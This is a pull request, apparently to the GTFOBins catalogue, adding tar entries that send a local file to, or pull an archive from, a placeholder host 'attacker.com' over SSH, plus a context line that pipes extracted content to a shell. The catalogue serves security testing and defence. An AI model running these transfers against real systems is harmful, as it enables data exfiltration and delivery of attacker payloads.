### PR TITLE
Add file-download and file-upload to tar

### DIFF
--- a/_gtfobins/tar.md
+++ b/_gtfobins/tar.md
@@ -12,7 +12,7 @@ functions:
         tar xf "$TF.tar" --to-command sh
         rm "$TF"*
   file-upload:
-    - description: Create tar archive and send it via SSH to a remote location. The attacker box must have the rmt utility installed.
+    - description: This only works for GNU tar. Create tar archive and send it via SSH to a remote location. The attacker box must have the `rmt` utility installed (it should be present by default in Debian-like distributions).
       code: |
         export RHOST=attacker.com
         export RUSER=root
@@ -20,7 +20,7 @@ functions:
         export LFILE=file_to_send
         tar cvf $RUSER@$RHOST:$RFILE $LFILE --rsh-command=/bin/ssh
   file-download:
-    - description: Download and extract a tar archive via SSH. The attacker box must have the rmt utility installed.
+    - description: This only works for GNU tar. Download and extract a tar archive via SSH. The attacker box must have the `rmt` utility installed (it should be present by default in Debian-like distributions).
       code: |
         export RHOST=attacker.com
         export RUSER=root

--- a/_gtfobins/tar.md
+++ b/_gtfobins/tar.md
@@ -11,6 +11,21 @@ functions:
         tar cf "$TF.tar" "$TF"
         tar xf "$TF.tar" --to-command sh
         rm "$TF"*
+  file-upload:
+    - description: Create tar archive and send it via SSH to a remote location. The attacker box must have the rmt utility installed.
+      code: |
+        export RHOST=attacker.com
+        export RUSER=root
+        export RFILE=/tmp/file_to_send.tar
+        export LFILE=file_to_send
+        tar cvf $RUSER@$RHOST:$RFILE $LFILE --rsh-command=/bin/ssh
+  file-download:
+    - description: Download and extract a tar archive via SSH. The attacker box must have the rmt utility installed.
+      code: |
+        export RHOST=attacker.com
+        export RUSER=root
+        export RFILE=/tmp/file_to_get.tar
+        tar xvf $RUSER@$RHOST:$RFILE --rsh-command=/bin/ssh
   file-write:
     - description: This only works for GNU tar.
       code: |


### PR DESCRIPTION
I've tested this on CentOS 7 as both the client and server.
The server needs to have the rmt utility installed (`yum install -y rmt`) the client does not require any changes.

The option `--rsh-command=/bin/ssh` is not necessary on a default CentOS 7 installation, but I'm unsure how other distributions set the default for this, so I've included it.